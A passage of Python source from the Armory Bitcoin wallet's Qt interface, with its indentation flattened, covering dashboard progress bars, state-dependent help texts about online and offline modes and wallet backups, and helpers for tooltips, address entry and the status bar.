self.lblTimeLeftBuild.setVisible(False)
elif phase==Cpp.BDMPhase_SearchHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Parsing Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(0)
self.barProgressScan.setRange(0,0)
self.lblTimeLeftScan.setVisible(False)
elif phase==Cpp.BDMPhase_ResolveHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Resolving Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(100)
self.barProgressScan.setRange(0,100)
self.barProgressScan.setFormat('%p%')
showPct = True
if tleft != 2**32 - 1:
tstring = secondsToHumanTime(tleft)
else:
tstring = "N/A"
showPct = False
pvalue = pct*100
if showPct:
if phase==BDMPhase_BlockHeaders or phase==BDMPhase_BlockData or phase==BDMPhase_DBHeaders:
self.lblTimeLeftBuild.setText(tstring)
self.barProgressBuild.setValue(pvalue)
elif phase==BDMPhase_Rescan or BDMPhase_ResolveHashes:
self.lblTimeLeftScan.setText(tstring)
self.barProgressScan.setValue(pvalue)
self.lblTimeLeftScan.setVisible(True)
elif sdmStr in ['NodeStatus_Initializing','NodeStatus_Syncing']:
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('%p%')
self.barProgressSync.setRange(0,100)
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setValue(0)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setValue(0)
self.barProgressScan.setFormat('')
if sdmStr == 'NodeStatus_Syncing':
sdmPercent = sdmState.chainState_.getProgressPct() * 100
self.lblTimeLeftSync.setText(\
"%d blocks remaining" % sdmState.chainState_.getBlocksLeft())
elif sdmStr == 'NodeStatus_Initializing':
sdmPercent = 0
self.barProgressSync.setRange(0,0)
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
else:
LOGERROR('Should not predict sync info in non init/sync SDM state')
return ('UNKNOWN','UNKNOWN', 'UNKNOWN')
self.barProgressSync.setValue(sdmPercent)
else:
LOGWARN('Called updateSyncProgress while not sync\'ing')
#############################################################################
def GetDashFunctionalityText(self, func):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
if func.lower() == 'scanning':
return self.tr( \
'The following functionalities are available while scanning in offline mode:'
'<ul>'
'<li>Create new wallets</li>'
'<li>Generate receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign transactions created from an online system</li>'
'<li>Sign messages</li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, even if you are offline. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline, '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'offline':
return self.tr( \
'The following functionalities are available in offline mode:'
'<ul>'
'<li>Create, import or recover wallets</li>'
'<li>Generate new receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Import private keys to wallets</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign messages</li>'
'<li><b>Sign transactions created from an online system</b></li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, regardless of whether you are online. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline, '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'online':
return self.tr( \
'<ul>'
'<li>Create, import or recover Armory wallets</li>'
'<li>Generate new addresses to receive coins</li>'
'<li>Send bitcoins to other people</li>'
'<li>Create one-time backups of your wallets (in printed or digital form)</li>'
'<li>Click on "bitcoin:" links in your web browser '
'(not supported on all operating systems)</li>'
'<li>Import private keys to wallets</li>'
'<li>Monitor payments to watching-only wallets and create '
'unsigned transactions</li>'
'<li>Sign messages</li>'
'<li><b>Create transactions with watching-only wallets, '
'to be signed by an offline wallets</b></li>'
'</ul>')
#############################################################################
def GetDashStateText(self, mgmtMode, state):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
# A few states don't care which mgmtMode you are in...
if state == 'NewUserInfo':
return self.tr(
'For more information about Armory, and even Bitcoin itself, you should '
'visit the <a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a> '
'and <a href="https://bitcoin.org">Bitcoin.org</a>. If '
'you are experiencing problems using this software, please visit the '
'<a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a>. Users '
'there will help you with any issues that you have. '
'<br><br>'
'<b><u>IMPORTANT:</u></b> Make a backup of your wallet(s)! Paper '
'backups protect you <i>forever</i> against forgotten passwords, '
'hard-drive failure, and make it easy for your family to recover '
'your funds if something terrible happens to you. <i>Each wallet '
'only needs to be backed up once, ever!</i> Without it, you are at '
'risk of losing all of your Bitcoins! '
'<br><br>')
elif state == 'OnlineFull1':
return self.tr( \
'<p><b>You now have access to all the features Armory has to offer!</b><br>'
'To see your balances and transaction history, please click '
'on the "Transactions" tab above this text. <br>'
'Here\'s some things you can do with Armory Bitcoin Client:'
'<br>')
elif state == 'OnlineFull2':
return ( \
(self.tr('If you experience any performance issues with Armory, '
'please confirm that Bitcoin Core is running and <i>fully '
'synchronized with the Bitcoin network</i>. You will see '
'a green checkmark in the bottom right corner of the '
'Bitcoin Core window if it is synchronized. If not, it is '
'recommended you close Armory and restart it only when you '
'see that checkmark.'
'<br><br>') if not self.doAutoBitcoind else '') + self.tr(
'<b>Please backup your wallets!</b> Armory wallets are '
'"deterministic", meaning they only need to be backed up '
'one time (unless you have imported external addresses/keys). '
'Make a backup and keep it in a safe place! All funds from '
'Armory-generated addresses will always be recoverable with '
'a paper backup, any time in the future. Use the "Backup '
'Individual Keys" option for each wallet to backup imported '
'keys.</p>'))
elif state == 'OnlineNeedSweep':
return self.tr( \
'Armory is currently online, but you have requested a sweep operation '
'on one or more private keys. This requires searching the global '
'transaction history for the available balance of the keys to be '
'swept. '
'<br><br>'
'Press the button to start the blockchain scan, which '
'will also put Armory into offline mode for a few minutes '
'until the scan operation is complete.')
elif state == 'OnlineDirty':
return self.tr( \
'<b>Wallet balances may '
'be incorrect until the rescan operation is performed!</b>'
'<br><br>'
'Armory is currently online, but addresses/keys have been added '
'without rescanning the blockchain. You may continue using '
'Armory in online mode, but any transactions associated with the '
'new addresses will not appear in the ledger. '
'<br><br>'
'Pressing the button above will put Armory into offline mode '
'for a few minutes until the scan operation is complete.')
elif state == 'OfflineNoSatoshiNoInternet':
return self.tr( \
'There is no connection to the internet, and there is no other '
'Bitcoin software running. Most likely '
'you are here because this is a system dedicated '
'to manage offline wallets! '
'<br><br>'
'<b>If you expected Armory to be in online mode</b>, '
'please verify your internet connection is active, '
'then restart Armory. If you think the lack of internet '
'connection is in error (such as if you are using Tor), '
'then you can restart Armory with the "--skip-online-check" '
'option, or change it in the Armory settings.'
'<br><br>'
'If you do not have Bitcoin Core installed, you can '
'download it from <a href="https://bitcoin.org">'
'https://bitcoin.org</a>.')
# Branch the available display text based on which Satoshi-Management
# mode Armory is using. It probably wasn't necessary to branch the
# the code like this, but it helped me organize the seemingly-endless
# number of dashboard screens I need
if mgmtMode.lower()=='user':
if state == 'OfflineButOnlinePossible':
return self.tr( \
'You are currently in offline mode, but can '
'switch to online mode by pressing the button above. However, '
'it is not recommended that you switch until '
'Bitcoin Core/bitcoind is fully synchronized with the bitcoin network. '
'You will see a green checkmark in the bottom-right corner of '
'the Bitcoin Core window when it is finished.'
'<br><br>'
'Switching to online mode will give you access '
'to more Armory functionality, including sending and receiving '
'bitcoins and viewing the balances and transaction histories '
'of each of your wallets.<br><br>')
elif state == 'OfflineNoSatoshi':
bitconf = os.path.join(BTC_HOME_DIR, 'bitcoin.conf')
return self.tr( \
'You are currently in offline mode because '
'Bitcoin Core is not running. To switch to online '
'mode, start Bitcoin Core and let it synchronize with the network '
'-- you will see a green checkmark in the bottom-right corner when '
'it is complete. If Bitcoin Core is already running and you believe '
'the lack of connection is an error (especially if using proxies), '
'please see <a href="'
'https://bitcointalk.org/index.php?topic=155717.msg1719077#msg1719077">'
'this link</a> for options.'
'<br><br>'
'<b>If you prefer to have Armory do this for you</b>, '
'then please check "Let Armory run '
'Bitcoin Core in the background" under "File"->"Settings."'
'<br><br>'
'If you already know what you\'re doing and simply need '
'to fetch the latest version of Bitcoin Core, you can download it from '
'<a href="https://bitcoin.org">https://bitcoin.org</a>.')
elif state == 'OfflineNoInternet':
return self.tr( \
'You are currently in offline mode because '
'Armory could not detect an internet connection. '
'If you think this is in error, then '
'restart Armory using the " --skip-online-check" option, '
'or adjust the Armory settings. Then restart Armory.'
'<br><br>'
'If this is intended to be an offline computer, note '
'that it is not necessary to have Bitcoin Core or bitcoind '
'running.' )
elif state == 'OfflineNoBlkFiles':
return self.tr( \
'You are currently in offline mode because '
'Armory could not find the blockchain files produced '
'by Bitcoin Core. Do you run Bitcoin Core (or bitcoind) '
'from a non-standard directory? Armory expects to '
'find the blkXXXX.dat files in <br><br>%1<br><br> '
'If you know where they are located, please restart '
'Armory using the " --satoshi-datadir=[path]" '
'to notify Armory where to find them.').arg(BLKFILE_DIR)
elif state == 'Disconnected':
return self.tr( \
'Armory was previously online, but the connection to Bitcoin Core/'
'bitcoind was interrupted. You will not be able to send bitcoins '
'or confirm receipt of bitcoins until the connection is '
'reestablished. <br><br>Please check that Bitcoin Core is open '
'and synchronized with the network. Armory will <i>try to '
'reconnect</i> automatically when the connection is available '
'again. If Bitcoin Core is available again, and reconnection does '
'not happen, please restart Armory.<br><br>')
elif state == 'ScanNoWallets':
return self.tr( \
'Please wait while the global transaction history is scanned. '
'Armory will go into online mode automatically, as soon as '
'the scan is complete.')
elif state == 'ScanWithWallets':
return self.tr( \
'Armory is scanning the global transaction history to retrieve '
'information about your wallets. The "Transactions" tab will '
'be updated with wallet balance and history as soon as the scan is '
'complete. You may manage your wallets while you wait.<br><br>')
else:
LOGERROR('Unrecognized dashboard state: Mgmt:%s, State:%s', \
mgmtMode, state)
return ''
elif mgmtMode.lower()=='auto':
if state == 'OfflineBitcoindRunning':
return self.tr( \
'It appears you are already running Bitcoin software '
'(Bitcoin Core or bitcoind). '
'Unlike previous versions of Armory, you should <u>not</u> run '
'this software yourself -- Armory '
'will run it in the background for you. Either close the '
'Bitcoin application or adjust your settings. If you change '
'your settings, then please restart Armory.')
if state == 'OfflineNeedBitcoinInst':
return self.tr( \
'<b>Only one more step to getting online with Armory!</b> You '
'must install the Bitcoin software from https://bitcoin.org in order '
'for Armory to communicate with the Bitcoin network. If the '
'Bitcoin software is already installed and/or you would prefer '
'to manage it yourself, please adjust your settings and '
'restart Armory.')
if state == 'InitializingLongTime':
return self.tr(
'<b>To maximize your security, the Bitcoin engine is downloading '
'and verifying the global transaction ledger. <u>This will take '
'several hours, but only needs to be done once</u>!</b> It is '
'usually best to leave it running over night for this '
'initialization process. Subsequent loads will only take a few '
'minutes. '
'<br><br> '
'<b>Please Note:</b> Between Armory and the underlying Bitcoin '
'engine, you need to have 120-130 GB of spare disk space available '
'to hold the global transaction history. '
'<br><br> '
'While you wait, you can manage your wallets. Make new wallets, '
'make digital or paper backups, create Bitcoin addresses to receive '
'payments, '
'sign messages, and/or import private keys. You will always '
'receive Bitcoin payments regardless of whether you are online, '
'but you will have to verify that payment through another service '
'until Armory is finished this initialization.')
if state == 'InitializingDoneSoon':
msg = self.tr( \
'The software is downloading and processing the latest activity '
'on the network related to your wallet(s). This should take only '
'a few minutes. While you wait, you can manage your wallet(s). '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallet(s) if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting your password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever!', "", len(self.walletMap))
return msg
if state == 'OnlineDisconnected':
return self.tr( \
'Armory\'s communication with the Bitcoin network was interrupted. '
'This usually does not happen unless you closed the process that '
'Armory was using to communicate with the network. Armory requires '
'%1 to be running in the background, and this error pops up if it '
'disappears.'
'<br><br>You may continue in offline mode, or you can close '
'all Bitcoin processes and restart Armory.').arg(os.path.basename(TheSDM.executable))
if state == 'OfflineBadConnection':
return self.tr( \
'Armory has experienced an issue trying to communicate with the '
'Bitcoin software. The software is running in the background, '
'but Armory cannot communicate with it through RPC as it expects '
'to be able to. If you changed any settings in the Bitcoin home '
'directory, please make sure that RPC is enabled and that it is '
'accepting connections from localhost. '
'<br><br>'
'If you have not changed anything, please export the log file '
'(from the "File" menu) and open an issue at https://github.com/goatpig/BitcoinArmory/issues')
if state == 'OfflineSatoshiAvail':
return self.tr( \
'Armory does not detect internet access, but it does detect '
'running Bitcoin software. Armory is in offline-mode. <br><br>'
'If you are intending to run an offline system, you will not '
'need to have the Bitcoin software installed on the offline '
'computer. It is only needed for the online computer. '
'If you expected to be online and '
'the absence of internet is an error, please restart Armory '
'using the "--skip-online-check" option. ')
if state == 'OfflineForcedButSatoshiAvail':
return self.tr( \
'Armory was started in offline-mode, but detected you are '
'running Bitcoin software. If you are intending to run an '
'offline system, you will <u>not</u> need to have the Bitcoin '
'software installed or running on the offline '
'computer. It is only required for being online. ')
if state == 'OfflineBadDBEnv':
return self.tr( \
'The Bitcoin software indicates there '
'is a problem with its databases. This can occur when '
'Bitcoin Core/bitcoind is upgraded or downgraded, or sometimes '
'just by chance after an unclean shutdown.'
'<br><br>'
'You can either revert your installed Bitcoin software to the '
'last known working version (but not earlier than version 0.8.1) '
'or delete everything <b>except</b> "wallet.dat" from your Bitcoin '
'home directory '
'<font face="courier"><b>%1</b></font>'
'<br><br>'
'If you choose to delete the contents of the Bitcoin home '
'directory, you will have to do a fresh download of the blockchain '
'again, which will require a few hours the first '
'time.').arg(self.satoshiHomePath)
if state == 'OfflineBtcdCrashed':
sout = '' if TheSDM.btcOut==None else str(TheSDM.btcOut)
serr = '' if TheSDM.btcErr==None else str(TheSDM.btcErr)
soutHtml = '<br><br>' + '<br>'.join(sout.strip().split('\n'))
serrHtml = '<br><br>' + '<br>'.join(serr.strip().split('\n'))
soutDisp = '<b><font face="courier">StdOut: %s</font></b>' % soutHtml
serrDisp = '<b><font face="courier">StdErr: %s</font></b>' % serrHtml
if len(sout)>0 or len(serr)>0:
return (self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'Output from bitcoind:<br>') + \
(soutDisp if len(sout)>0 else '') + \
(serrDisp if len(serr)>0 else '') )
else:
return ( self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'<br><br> '
'Unfortunately, this error is so strange, Armory does not '
'recognize it. Please go to "Export Log File" from the "File" '
'menu and submit an issue at https://github.com/goatpig/BitcoinArmory/issues. '
'We apologize for the inconvenience!'))
# TODO - move out of polling and call on events
#############################################################################
def setDashboardDetails(self, INIT=False):
"""
We've dumped all the dashboard text into the above 2 methods in order
to declutter this method.
"""
if self.isShuttingDown:
return
sdmStr = TheSDM.getSDMStateStr()
bdmState = TheBDM.getState()
descr = ''
descr1 = ''
descr2 = ''
# Methods for showing/hiding groups of widgets on the dashboard
def setBtnRowVisible(r, visBool):
for c in range(3):
self.dashBtns[r][c].setVisible(visBool)
def setSyncRowVisible(b):
self.lblDashModeSync.setVisible(b)
self.barProgressSync.setVisible(b)
self.lblTimeLeftSync.setVisible(b)
def setBuildRowVisible(b):
self.lblDashModeBuild.setVisible(b)
self.barProgressBuild.setVisible(b)
self.lblTimeLeftBuild.setVisible(b)
def setScanRowVisible(b):
self.lblDashModeScan.setVisible(b)
self.barProgressScan.setVisible(b)
self.lblTimeLeftScan.setVisible(b)
def setOnlyDashModeVisible():
setSyncRowVisible(False)
setBuildRowVisible(False)
setScanRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setVisible(True)
def setBtnFrameVisible(b, descr=''):
self.frmDashMidButtons.setVisible(b)
self.lblDashBtnDescr.setVisible(len(descr)>0)
self.lblDashBtnDescr.setText(descr)
if INIT:
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, False)
setBtnRowVisible(DASHBTNS.Close, False)
setOnlyDashModeVisible()
if sdmStr != self.lastSDMStr:
if sdmStr == "NodeStatus_Offline":
# User is letting Armory manage the Satoshi client for them.
setSyncRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
# There's a whole bunch of stuff that has to be hidden/shown
# depending on the state... set some reasonable defaults here
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Close, False)
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if TheSDM.satoshiIsAvailable():
self.frmDashMidButtons.setVisible(True)
setBtnRowVisible(DASHBTNS.Close, True)
if CLI_OPTIONS.offline:
# Forced offline but bitcoind is running
LOGINFO('Dashboard switched to auto-OfflineForcedButSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineForcedButSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineNoSatoshiNoInternet')
setBtnFrameVisible(True, \
self.tr('In case you actually do have internet access, you can use '
'the following links to get Armory installed. Or change '
'your settings.'))
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
descr1 += self.GetDashStateText('Auto','OfflineNoSatoshiNoInternet')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_BadPath":
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
LOGINFO('Dashboard switched to auto-cannotFindExeHome')
self.lblDashModeSync.setText(self.tr('Cannot find Bitcoin Home Directory'), \
size=4, bold=True)
setBtnRowVisible(DASHBTNS.Close, TheSDM.satoshiIsAvailable())
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(self.tr('Check Again'))
setBtnFrameVisible(True)
descr1 += self.GetDashStateText('Auto', 'OfflineNeedBitcoinInst')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_Initializing" or \
sdmStr == "NodeStatus_Syncing":
self.wasSynchronizing = True
LOGINFO('Dashboard switched to auto-InitSync')
self.lblBusy.setVisible(True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.updateSyncProgress()
# If torrent ever ran, leave it visible
setSyncRowVisible(True)
setScanRowVisible(True)
if sdmStr == "NodeStatus_Initializing":
self.lblDashModeSync.setText( self.tr('Initializing Bitcoin Engine'), size=4, bold=True, color='Foreground')
elif sdmStr == "NodeStatus_Syncing":
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), size=4, bold=True, color='Foreground')
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
descr1 += self.GetDashStateText('Auto', 'InitializingDoneSoon')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
self.tr('Since version 0.88, Armory runs bitcoind in the '
'background. You can switch back to '
'the old way in the Settings dialog. '))
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
self.lastSDMStr = sdmStr
if bdmState == BDM_BLOCKCHAIN_READY:
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
self.lblBusy.setVisible(False)
if self.netMode == NETWORKMODE.Disconnected:
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is disconnected'), size=4, color='TextWarn', bold=True)
descr = self.GetDashStateText('User','Disconnected')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
# Fully online mode
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is online!'), color='TextGreen', size=4, bold=True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
descr = self.GetDashStateText('User', 'OnlineFull1')
descr += self.GetDashFunctionalityText('Online')
descr += self.GetDashStateText('User', 'OnlineFull2')
self.lblDashDescr1.setText(descr)
elif bdmState == BDM_SCANNING or bdmState == BDM_UNINITIALIZED:
LOGINFO('Dashboard switched to "Scanning" mode')
setSyncRowVisible(False)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
self.lblBusy.setVisible(True)
self.btnModeSwitch.setVisible(False)
if sdmStr == 'NodeStatus_Ready':
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.lblDashModeSync.setVisible(True)
self.lblTimeLeftSync.setText('')
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
else:
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(False)
if len(unicode(self.lblDashModeBuild.text()).strip()) == 0:
self.lblDashModeBuild.setText( self.tr('Preparing Databases'), \
size=4, bold=True, color='Foreground')
if len(unicode(self.lblDashModeScan.text()).strip()) == 0:
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
if len(self.walletMap)==0:
descr = self.GetDashStateText('User','ScanNoWallets')
else:
descr = self.GetDashStateText('User','ScanWithWallets')
descr += self.GetDashStateText('Auto', 'NewUserInfo')
descr += self.GetDashFunctionalityText('Scanning') + '<br>'
self.lblDashDescr1.setText(descr)
self.lblDashDescr2.setText('')
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
elif bdmState == BDM_OFFLINE:
pass
else:
LOGERROR('What the heck blockchain mode are we in? %s', bdmState)
self.lblDashModeSync.setContentsMargins( 50,5,50,5)
self.lblDashModeBuild.setContentsMargins(50,5,50,5)
self.lblDashModeScan.setContentsMargins( 50,5,50,5)
vbar = self.dashScrollArea.verticalScrollBar()
# On Macs, this causes the main window scroll area to keep bouncing back
# to the top. Not setting the value seems to fix it. DR - 2014/02/12
if not OS_MACOSX:
vbar.setValue(vbar.minimum())
if self.lblBusy.isVisible():
self.numHeartBeat += 1
self.lblBusy.setPixmap(QPixmap(':/loadicon_%d.png' % \
(self.numHeartBeat%6)))
#############################################################################
def createToolTipWidget(self, tiptext, iconSz=2):
"""
The <u></u> is to signal to Qt that it should be interpretted as HTML/Rich
text even if no HTML tags are used. This appears to be necessary for Qt
to wrap the tooltip text
"""
fgColor = htmlColor('ToolTipQ')
lbl = QLabel('<font size=%d color=%s>(?)</font>' % (iconSz, fgColor))
lbl.setMaximumWidth(relaxedSizeStr(lbl, '(?)')[0])
def setAllText(wself, txt):
def pressEv(ev):
QWhatsThis.showText(ev.globalPos(), txt, self)
wself.mousePressEvent = pressEv
wself.setToolTip('<u></u>' + txt)
# Calling setText on this widget will update both the tooltip and QWT
from types import MethodType
lbl.setText = MethodType(setAllText, lbl)
lbl.setText(tiptext)
return lbl
#############################################################################
def createAddressEntryWidgets(self, parent, initString='', maxDetectLen=128,
boldDetectParts=0, **cabbKWArgs):
"""
If you are putting the LBL_DETECT somewhere that is space-constrained,
set maxDetectLen to a smaller value. It will limit the number of chars
to be included in the autodetect label.
"cabbKWArgs" is "create address book button kwargs"
Here's the signature of that function... you can pass any named args
to this function and they will be passed along to createAddrBookButton
def createAddrBookButton(parent, targWidget, defaultWltID=None,
actionStr="Select", selectExistingOnly=False,
selectMineOnly=False, getPubKey=False,
showLockboxes=True)
Returns three widgets that can be put into layouts:
[[QLineEdit: addr/pubkey]] [[Button: Addrbook]]
[[Label: Wallet/Lockbox/Addr autodetect]]
"""
addrEntryObjs = {}
addrEntryObjs['QLE_ADDR'] = QLineEdit()
addrEntryObjs['QLE_ADDR'].setText(initString)
addrEntryObjs['BTN_BOOK'] = createAddrBookButton(parent,
addrEntryObjs['QLE_ADDR'],
**cabbKWArgs)
addrEntryObjs['LBL_DETECT'] = QRichLabel('')
addrEntryObjs['CALLBACK_GETSCRIPT'] = None
##########################################################################
# Create a function that reads the user string and updates labels if
# the entry is recognized. This will be used to automatically show the
# user that what they entered is recognized and gives them more info
#
# It's a little awkward to put this whole thing in here... this could
# probably use some refactoring
def updateAddrDetectLabels():
try:
enteredText = str(addrEntryObjs['QLE_ADDR'].text()).strip()
scriptInfo = self.getScriptForUserString(enteredText)
displayInfo = self.getDisplayStringForScript(
scriptInfo['Script'], maxDetectLen, boldDetectParts,
prefIDOverAddr=scriptInfo['ShowID'])
dispStr = displayInfo['String']
if displayInfo['WltID'] is None and displayInfo['LboxID'] is None:
addrEntryObjs['LBL_DETECT'].setText(dispStr)
else:
addrEntryObjs['LBL_DETECT'].setText(dispStr, color='TextBlue')
# No point in repeating what the user just entered
addrEntryObjs['LBL_DETECT'].setVisible(enteredText != dispStr)
addrEntryObjs['QLE_ADDR'].setCursorPosition(0)
except:
#LOGEXCEPT('Invalid recipient string')
addrEntryObjs['LBL_DETECT'].setVisible(False)
addrEntryObjs['LBL_DETECT'].setVisible(False)
# End function to be connected
##########################################################################
# Now actually connect the entry widgets
parent.connect(addrEntryObjs['QLE_ADDR'], SIGNAL('textChanged(QString)'),
updateAddrDetectLabels)
updateAddrDetectLabels()
# Create a func that can be called to get the script that was entered
# This uses getScriptForUserString() which actually returns 4 vals
# rawScript, wltIDorNone, lboxIDorNone, addrStringEntered
# (The last one is really only used to determine what info is most
# relevant to display to the user...it can be ignored in most cases)
def getScript():
entered = str(addrEntryObjs['QLE_ADDR'].text()).strip()
return self.getScriptForUserString(entered)
addrEntryObjs['CALLBACK_GETSCRIPT'] = getScript
return addrEntryObjs
#############################################################################
def getScriptForUserString(self, userStr):
return getScriptForUserString(userStr, self.walletMap, self.allLockboxes)
#############################################################################
def getDisplayStringForScript(self, binScript, maxChars=256,
doBold=0, prefIDOverAddr=False,
lblTrunc=12, lastTrunc=12):
return getDisplayStringForScript(binScript, self.walletMap,
self.allLockboxes, maxChars, doBold,
prefIDOverAddr, lblTrunc, lastTrunc)
#############################################################################
def updateWalletData(self):
for wltid in self.walletMap:
self.walletMap[wltid].getBalancesAndCountFromDB()
self.walletMap[wltid].getAddrDataFromDB()
for lbid in self.cppLockboxWltMap:
self.cppLockboxWltMap[lbid].getBalancesAndCountFromDB(\
TheBDM.topBlockHeight, IGNOREZC)
#############################################################################
def updateStatusBarText(self):
if self.nodeStatus.status_ == Cpp.NodeStatus_Online:
haveRPC = (self.nodeStatus.rpcStatus_ == RpcStatus_Online)
if haveRPC:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1>Connected (%2 blocks)</font> ').arg(
htmlColor('TextGreen'), str(TheBDM.getTopBlockHeight())))
else:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Connected (%2 blocks)</b></font> ').arg(
htmlColor('TextPurple'), str(TheBDM.getTopBlockHeight())))
def getToolTipTextOnline():
tt = QString()
if not haveRPC:
tt = self.tr('RPC disabled!<br><br>')
blkRecvAgo = RightNow() - self.blkReceived
tt = tt + self.tr('Last block received %1 ago').arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOnline)
